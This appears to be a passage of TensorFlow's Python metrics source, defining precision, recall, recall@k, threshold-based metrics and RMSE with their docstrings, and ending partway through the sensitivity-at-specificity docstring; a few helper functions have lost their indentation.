@tf_export('metrics.true_positives_at_thresholds')
def true_positives_at_thresholds(labels,
                                 predictions,
                                 thresholds,
                                 weights=None,
                                 metrics_collections=None,
                                 updates_collections=None,
                                 name=None):
  """Computes true positives at provided threshold values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` whose shape matches `predictions`. Will be cast to
      `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that `true_positives`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    true_positives: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that updates the `true_positives` variable and
      returns its current value.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.true_positives_at_thresholds is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'true_positives',
                                     (predictions, labels, weights)):
    # Only the 'tp' entry of the confusion matrix is needed here.
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights=weights, includes=('tp',))
    update_op = update_ops['tp']
    tp_value = _aggregate_variable(values['tp'], metrics_collections)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return tp_value, update_op
@tf_export('metrics.precision')
def precision(labels,
              predictions,
              weights=None,
              metrics_collections=None,
              updates_collections=None,
              name=None):
  """Computes the precision of the predictions with respect to the labels.

  The `precision` function creates two local variables, `true_positives` and
  `false_positives`, that are used to compute the precision. This value is
  ultimately returned as `precision`, an idempotent operation that simply
  divides `true_positives` by the sum of `true_positives` and
  `false_positives`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision`. `update_op` weights each prediction by the corresponding value
  in `weights`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
      be cast to `bool`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that `precision`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    precision: Scalar float `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_positives`.
    update_op: `Operation` that increments `true_positives` and
      `false_positives` variables appropriately and whose value matches
      `precision`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.precision is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'precision',
                                     (predictions, labels, weights)):
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=math_ops.cast(predictions, dtype=dtypes.bool),
        labels=math_ops.cast(labels, dtype=dtypes.bool),
        weights=weights)

    # Collections are deliberately not forwarded: this metric manages its own
    # value and update collections below.
    true_p, tp_update_op = true_positives(
        labels,
        predictions,
        weights,
        metrics_collections=None,
        updates_collections=None,
        name=None)
    false_p, fp_update_op = false_positives(
        labels,
        predictions,
        weights,
        metrics_collections=None,
        updates_collections=None,
        name=None)

    def compute_precision(tp, fp, name):
      # Precision is defined as 0 when there are no positive predictions.
      return array_ops.where(
          math_ops.greater(tp + fp, 0), math_ops.div(tp, tp + fp), 0, name)

    def once_across_replicas(_, tp, fp):
      return compute_precision(tp, fp, 'value')

    p = _aggregate_across_replicas(metrics_collections, once_across_replicas,
                                   true_p, false_p)
    update_op = compute_precision(tp_update_op, fp_update_op, 'update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return p, update_op
@tf_export('metrics.precision_at_thresholds')
def precision_at_thresholds(labels,
                            predictions,
                            thresholds,
                            weights=None,
                            metrics_collections=None,
                            updates_collections=None,
                            name=None):
  """Computes precision values for different `thresholds` on `predictions`.

  The `precision_at_thresholds` function creates four local variables,
  `true_positives`, `true_negatives`, `false_positives` and `false_negatives`
  for various values of thresholds. `precision[i]` is defined as the total
  weight of values in `predictions` above `thresholds[i]` whose corresponding
  entry in `labels` is `True`, divided by the total weight of values in
  `predictions` above `thresholds[i]`
  (`true_positives[i] / (true_positives[i] + false_positives[i])`).

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that `auc` should be
      added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    precision: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables that
      are used in the computation of `precision`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.precision_at_thresholds is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'precision_at_thresholds',
                                     (predictions, labels, weights)):
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights, includes=('tp', 'fp'))

    # A small epsilon keeps the division well-defined when tp + fp == 0.
    epsilon = 1e-7

    def compute_precision(tp, fp, name):
      return math_ops.div(tp, epsilon + tp + fp, name='precision_' + name)

    def precision_across_replicas(_, values):
      return compute_precision(values['tp'], values['fp'], 'value')

    prec = _aggregate_across_replicas(
        metrics_collections, precision_across_replicas, values)
    update_op = compute_precision(update_ops['tp'], update_ops['fp'],
                                  'update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return prec, update_op
@tf_export('metrics.recall')
def recall(labels,
           predictions,
           weights=None,
           metrics_collections=None,
           updates_collections=None,
           name=None):
  """Computes the recall of the predictions with respect to the labels.

  The `recall` function creates two local variables, `true_positives`
  and `false_negatives`, that are used to compute the recall. This value is
  ultimately returned as `recall`, an idempotent operation that simply divides
  `true_positives` by the sum of `true_positives` and `false_negatives`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` that updates these variables and returns the `recall`.
  `update_op` weights each prediction by the corresponding value in `weights`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
      be cast to `bool`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `recall` should
      be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    recall: Scalar float `Tensor` with the value of `true_positives` divided
      by the sum of `true_positives` and `false_negatives`.
    update_op: `Operation` that increments `true_positives` and
      `false_negatives` variables appropriately and whose value matches
      `recall`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    # Fixed: the message previously read "is not supported is not supported".
    raise RuntimeError('tf.metrics.recall is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'recall',
                                     (predictions, labels, weights)):
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=math_ops.cast(predictions, dtype=dtypes.bool),
        labels=math_ops.cast(labels, dtype=dtypes.bool),
        weights=weights)

    # Collections are deliberately not forwarded: this metric manages its own
    # value and update collections below.
    true_p, true_positives_update_op = true_positives(
        labels,
        predictions,
        weights,
        metrics_collections=None,
        updates_collections=None,
        name=None)
    false_n, false_negatives_update_op = false_negatives(
        labels,
        predictions,
        weights,
        metrics_collections=None,
        updates_collections=None,
        name=None)

    def compute_recall(true_p, false_n, name):
      # Recall is defined as 0 when there are no positive labels.
      return array_ops.where(
          math_ops.greater(true_p + false_n, 0),
          math_ops.div(true_p, true_p + false_n), 0, name)

    def once_across_replicas(_, true_p, false_n):
      return compute_recall(true_p, false_n, 'value')

    rec = _aggregate_across_replicas(
        metrics_collections, once_across_replicas, true_p, false_n)

    update_op = compute_recall(true_positives_update_op,
                               false_negatives_update_op, 'update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return rec, update_op
def _at_k_name(name, k=None, class_id=None):
if k is not None:
name = '%s_at_%d' % (name, k)
else:
name = '%s_at_k' % (name)
if class_id is not None:
name = '%s_class%d' % (name, class_id)
return name
def _select_class_id(ids, selected_id):
  """Filter all but `selected_id` out of `ids`.

  Args:
    ids: `int64` `Tensor` or `SparseTensor` of IDs.
    selected_id: Int id to select.

  Returns:
    `SparseTensor` of same dimensions as `ids`. This contains only the entries
    equal to `selected_id`.
  """
  ids = sparse_tensor.convert_to_tensor_or_sparse_tensor(ids)
  if isinstance(ids, sparse_tensor.SparseTensor):
    # Sparse case: drop every value that is not the selected ID.
    keep = math_ops.equal(ids.values, selected_id)
    return sparse_ops.sparse_retain(ids, keep)

  # Dense case: intersect `ids` with a tensor filled with `selected_id`.
  # TODO(ptucker): Make this more efficient, maybe add a sparse version of
  # tf.equal and tf.reduce_any?

  # Shape of filled IDs matches `ids` with the last dim collapsed to 1.
  dense_shape = array_ops.shape(ids, out_type=dtypes.int64)
  last_dim = array_ops.size(dense_shape) - 1
  filled_shape = math_ops.reduced_shape(dense_shape,
                                        array_ops.reshape(last_dim, [1]))
  filled_selected_id = array_ops.fill(filled_shape,
                                      math_ops.to_int64(selected_id))
  intersection = sets.set_intersection(filled_selected_id, ids)
  return sparse_tensor.SparseTensor(
      indices=intersection.indices,
      values=intersection.values,
      dense_shape=dense_shape)
def _maybe_select_class_id(labels, predictions_idx, selected_id=None):
"""If class ID is specified, filter all other classes.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: `int64` `Tensor` of class IDs, with shape [D1, ... DN, k]
where N >= 1. Commonly, N=1 and `predictions_idx` has shape
[batch size, k].
selected_id: Int id to select.
Returns:
Tuple of `labels` and `predictions_idx`, possibly with classes removed.
"""
if selected_id is None:
return labels, predictions_idx
return (_select_class_id(labels, selected_id),
_select_class_id(predictions_idx, selected_id))
def _sparse_true_positive_at_k(labels,
                               predictions_idx,
                               class_id=None,
                               weights=None,
                               name=None):
  """Calculates true positives for recall@k and precision@k.

  If `class_id` is specified, calculate binary true positives for `class_id`
  only. If `class_id` is not specified, calculate metrics for `k` predicted
  vs `n` label classes, where `n` is the 2nd dimension of `labels_sparse`.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels`.
    name: Name of operation.

  Returns:
    A [D1, ... DN] `Tensor` of true positive counts.
  """
  with ops.name_scope(name, 'true_positives',
                      (predictions_idx, labels, weights)):
    labels, predictions_idx = _maybe_select_class_id(labels, predictions_idx,
                                                     class_id)
    # True positives per entry: size of the intersection of predicted and
    # actual label sets.
    tp = math_ops.to_double(
        sets.set_size(sets.set_intersection(predictions_idx, labels)))
    if weights is None:
      return tp
    broadcast_check = weights_broadcast_ops.assert_broadcastable(weights, tp)
    with ops.control_dependencies((broadcast_check,)):
      return math_ops.multiply(tp, math_ops.to_double(weights))
def _streaming_sparse_true_positive_at_k(labels,
                                         predictions_idx,
                                         k=None,
                                         class_id=None,
                                         weights=None,
                                         name=None):
  """Calculates weighted per step true positives for recall@k and precision@k.

  If `class_id` is specified, calculate binary true positives for `class_id`
  only. If `class_id` is not specified, calculate metrics for `k` predicted
  vs `n` label classes, where `n` is the 2nd dimension of `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    k: Integer, k for @k metric. This is only used for default op name.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels`.
    name: Name of new variable, and namespace for other dependent ops.

  Returns:
    A tuple of `Variable` and update `Operation`.

  Raises:
    ValueError: If `weights` is not `None` and has an incompatible shape.
  """
  default_name = _at_k_name('true_positive', k, class_id=class_id)
  with ops.name_scope(name, default_name,
                      (predictions_idx, labels, weights)) as scope:
    per_entry_tp = _sparse_true_positive_at_k(
        predictions_idx=predictions_idx,
        labels=labels,
        class_id=class_id,
        weights=weights)
    # Sum over the batch and accumulate into a streaming float64 variable.
    batch_total_tp = math_ops.to_double(math_ops.reduce_sum(per_entry_tp))
    var = metric_variable([], dtypes.float64, name=scope)
    update = state_ops.assign_add(var, batch_total_tp, name='update')
    return var, update
def _sparse_false_negative_at_k(labels,
                                predictions_idx,
                                class_id=None,
                                weights=None):
  """Calculates false negatives for recall@k.

  If `class_id` is specified, calculate binary true positives for `class_id`
  only. If `class_id` is not specified, calculate metrics for `k` predicted
  vs `n` label classes, where `n` is the 2nd dimension of `labels_sparse`.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels`.

  Returns:
    A [D1, ... DN] `Tensor` of false negative counts.
  """
  with ops.name_scope(None, 'false_negatives',
                      (predictions_idx, labels, weights)):
    labels, predictions_idx = _maybe_select_class_id(labels, predictions_idx,
                                                     class_id)
    # False negatives per entry: labels that were not predicted
    # (labels - predictions, via aminusb=False i.e. b minus a).
    fn = math_ops.to_double(
        sets.set_size(
            sets.set_difference(predictions_idx, labels, aminusb=False)))
    if weights is None:
      return fn
    broadcast_check = weights_broadcast_ops.assert_broadcastable(weights, fn)
    with ops.control_dependencies((broadcast_check,)):
      return math_ops.multiply(fn, math_ops.to_double(weights))
def _streaming_sparse_false_negative_at_k(labels,
                                          predictions_idx,
                                          k,
                                          class_id=None,
                                          weights=None,
                                          name=None):
  """Calculates weighted per step false negatives for recall@k.

  If `class_id` is specified, calculate binary true positives for `class_id`
  only. If `class_id` is not specified, calculate metrics for `k` predicted
  vs `n` label classes, where `n` is the 2nd dimension of `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    k: Integer, k for @k metric. This is only used for default op name.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels`.
    name: Name of new variable, and namespace for other dependent ops.

  Returns:
    A tuple of `Variable` and update `Operation`.

  Raises:
    ValueError: If `weights` is not `None` and has an incompatible shape.
  """
  default_name = _at_k_name('false_negative', k, class_id=class_id)
  with ops.name_scope(name, default_name,
                      (predictions_idx, labels, weights)) as scope:
    per_entry_fn = _sparse_false_negative_at_k(
        predictions_idx=predictions_idx,
        labels=labels,
        class_id=class_id,
        weights=weights)
    # Sum over the batch and accumulate into a streaming float64 variable.
    batch_total_fn = math_ops.to_double(math_ops.reduce_sum(per_entry_fn))
    var = metric_variable([], dtypes.float64, name=scope)
    update = state_ops.assign_add(var, batch_total_fn, name='update')
    return var, update
@tf_export('metrics.recall_at_k')
def recall_at_k(labels,
                predictions,
                k,
                class_id=None,
                weights=None,
                metrics_collections=None,
                updates_collections=None,
                name=None):
  """Computes recall@k of the predictions with respect to sparse labels.

  If `class_id` is specified, we calculate recall by considering only the
  entries in the batch for which `class_id` is in the label, and computing the
  fraction of them for which `class_id` is in the top-k `predictions`.
  If `class_id` is not specified, we'll calculate recall as how often on
  average a class among the labels of a batch entry is in the top-k
  `predictions`.

  `sparse_recall_at_k` creates two local variables, `true_positive_at_<k>` and
  `false_negative_at_<k>`, that are used to compute the recall_at_k frequency.
  This frequency is ultimately returned as `recall_at_<k>`: an idempotent
  operation that simply divides `true_positive_at_<k>` by total
  (`true_positive_at_<k>` + `false_negative_at_<k>`).

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `recall_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
  indicating the top `k` `predictions`. Set operations applied to `top_k` and
  `labels` calculate the true positives and false negatives weighted by
  `weights`. Then `update_op` increments `true_positive_at_<k>` and
  `false_negative_at_<k>` using these values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range always count
      towards `false_negative_at_<k>`.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and predictions has shape
      [batch size, num_classes]. The final dimension contains the logit values
      for each class. [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric.
    class_id: Integer class ID for which we want binary metrics. This should
      be in range [0, num_classes), where num_classes is the last dimension of
      `predictions`. If class_id is outside this range, the method returns
      NAN.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.

  Returns:
    recall: Scalar `float64` `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_negatives`.
    update_op: `Operation` that increments `true_positives` and
      `false_negatives` variables appropriately, and whose value matches
      `recall`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `predictions`, or if either `metrics_collections` or
      `updates_collections` are not a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.recall_at_k is not '
                       'supported when eager execution is enabled.')

  default_name = _at_k_name('recall', k, class_id=class_id)
  with ops.name_scope(name, default_name,
                      (predictions, labels, weights)) as scope:
    # Reduce logits to top-k class indices, then delegate to the index-based
    # variant.
    _, top_k_idx = nn.top_k(predictions, k)
    return recall_at_top_k(
        labels=labels,
        predictions_idx=top_k_idx,
        k=k,
        class_id=class_id,
        weights=weights,
        metrics_collections=metrics_collections,
        updates_collections=updates_collections,
        name=scope)
@tf_export('metrics.recall_at_top_k')
def recall_at_top_k(labels,
                    predictions_idx,
                    k=None,
                    class_id=None,
                    weights=None,
                    metrics_collections=None,
                    updates_collections=None,
                    name=None):
  """Computes recall@k of top-k predictions with respect to sparse labels.
  Differs from `recall_at_k` in that predictions must be in the form of top `k`
  class indices, whereas `recall_at_k` expects logits. Refer to `recall_at_k`
  for more details.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range always count
      towards `false_negative_at_<k>`.
    predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where N >= 1.
      Commonly, N=1 and predictions has shape [batch size, k]. The final
      dimension contains the top `k` predicted class indices. [D1, ... DN] must
      match `labels`.
    k: Integer, k for @k metric. Only used for the default op name.
    class_id: Integer class ID for which we want binary metrics. This should be
      in range [0, num_classes), where num_classes is the last dimension of
      `predictions`. If class_id is outside this range, the method returns NAN.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.
  Returns:
    recall: Scalar `float64` `Tensor` with the value of `true_positives` divided
      by the sum of `true_positives` and `false_negatives`.
    update_op: `Operation` that increments `true_positives` and
      `false_negatives` variables appropriately, and whose value matches
      `recall`.
  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `predictions`, or if either `metrics_collections` or `updates_collections`
      are not a list or tuple.
  """
  with ops.name_scope(name, _at_k_name('recall', k, class_id=class_id),
                      (predictions_idx, labels, weights)) as scope:
    # If `labels` is [D1, ... DN], append a trailing num_labels=1 dimension so
    # its rank matches `predictions_idx`.
    labels = _maybe_expand_labels(labels, predictions_idx)
    # The set operations used by the TP/FN helpers require int64 indices.
    top_k_idx = math_ops.to_int64(predictions_idx)
    # Streaming accumulators: `tp`/`fn` read the running totals, while
    # `tp_update`/`fn_update` add this batch's counts to them.
    tp, tp_update = _streaming_sparse_true_positive_at_k(
        predictions_idx=top_k_idx,
        labels=labels,
        k=k,
        class_id=class_id,
        weights=weights)
    fn, fn_update = _streaming_sparse_false_negative_at_k(
        predictions_idx=top_k_idx,
        labels=labels,
        k=k,
        class_id=class_id,
        weights=weights)
    def compute_recall(_, tp, fn):
      # recall = TP / (TP + FN).
      return math_ops.div(tp, math_ops.add(tp, fn), name=scope)
    metric = _aggregate_across_replicas(
        metrics_collections, compute_recall, tp, fn)
    # The update op evaluates recall from the freshly-incremented totals, so
    # its value matches `metric` after it runs.
    update = math_ops.div(
        tp_update, math_ops.add(tp_update, fn_update), name='update')
    if updates_collections:
      ops.add_to_collections(updates_collections, update)
    return metric, update
@tf_export('metrics.recall_at_thresholds')
def recall_at_thresholds(labels,
                         predictions,
                         thresholds,
                         weights=None,
                         metrics_collections=None,
                         updates_collections=None,
                         name=None):
  """Computes various recall values for different `thresholds` on `predictions`.
  The `recall_at_thresholds` function creates four local variables,
  `true_positives`, `true_negatives`, `false_positives` and `false_negatives`
  for various values of thresholds. `recall[i]` is defined as the total weight
  of values in `predictions` above `thresholds[i]` whose corresponding entry in
  `labels` is `True`, divided by the total weight of `True` values in `labels`
  (`true_positives[i] / (true_positives[i] + false_negatives[i])`).
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `recall`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `recall` should be
      added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    recall: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables that
      are used in the computation of `recall`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.recall_at_thresholds is not '
                       'supported when eager execution is enabled.')
  with variable_scope.variable_scope(name, 'recall_at_thresholds',
                                     (predictions, labels, weights)):
    # Recall only needs TP and FN, so only those accumulators are created.
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights, includes=('tp', 'fn'))
    # Avoid division by zero.
    epsilon = 1e-7
    def compute_recall(tp, fn, name):
      # Element-wise recall per threshold: TP / (TP + FN).
      return math_ops.div(tp, epsilon + tp + fn, name='recall_' + name)
    def recall_across_replicas(_, values):
      return compute_recall(values['tp'], values['fn'], 'value')
    rec = _aggregate_across_replicas(
        metrics_collections, recall_across_replicas, values)
    # The update op computes recall from the incremented accumulators, so its
    # value matches `rec` after it runs.
    update_op = compute_recall(update_ops['tp'], update_ops['fn'], 'update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return rec, update_op
@tf_export('metrics.root_mean_squared_error')
def root_mean_squared_error(labels,
                            predictions,
                            weights=None,
                            metrics_collections=None,
                            updates_collections=None,
                            name=None):
  """Computes the root mean squared error between the labels and predictions.
  The `root_mean_squared_error` function creates two local variables,
  `total` and `count` that are used to compute the root mean squared error.
  This average is weighted by `weights`, and it is ultimately returned as
  `root_mean_squared_error`: an idempotent operation that takes the square root
  of the division of `total` by `count`.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `root_mean_squared_error`. Internally, a `squared_error` operation computes
  the element-wise square of the difference between `predictions` and `labels`.
  Then `update_op` increments `total` with the reduced sum of the product of
  `weights` and `squared_error`, and it increments `count` with the reduced sum
  of `weights`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that
      `root_mean_squared_error` should be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    root_mean_squared_error: A `Tensor` representing the current mean, the value
      of `total` divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `root_mean_squared_error`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.root_mean_squared_error is not '
                       'supported when eager execution is enabled.')
  predictions, labels, weights = _remove_squeezable_dimensions(
      predictions=predictions, labels=labels, weights=weights)
  # Delegate accumulation to mean_squared_error. Collections are passed as
  # None so the RMSE tensors below (not the intermediate MSE ones) are what
  # get added to the caller's collections.
  mse, update_mse_op = mean_squared_error(labels, predictions, weights, None,
                                          None, name or
                                          'root_mean_squared_error')
  # sqrt is applied after cross-replica aggregation of MSE, since
  # sqrt(mean(x)) != mean(sqrt(x)).
  once_across_replicas = lambda _, mse: math_ops.sqrt(mse)
  rmse = _aggregate_across_replicas(
      metrics_collections, once_across_replicas, mse)
  update_rmse_op = math_ops.sqrt(update_mse_op)
  if updates_collections:
    ops.add_to_collections(updates_collections, update_rmse_op)
  return rmse, update_rmse_op
@tf_export('metrics.sensitivity_at_specificity')
def sensitivity_at_specificity(labels,
                               predictions,
                               specificity,
                               weights=None,
                               num_thresholds=200,
                               metrics_collections=None,
                               updates_collections=None,
                               name=None):
  """Computes the sensitivity at a given specificity.
  The `sensitivity_at_specificity` function creates four local
  variables, `true_positives`, `true_negatives`, `false_positives` and
  `false_negatives` that are used to compute the sensitivity at the given
  specificity value. The threshold for the given specificity value is computed
  and used to evaluate the corresponding sensitivity.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `sensitivity`. `update_op` increments the `true_positives`, `true_negatives`,
  `false_positives` and `false_negatives` counts with the weight of each case
  found in the `predictions` and `labels`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
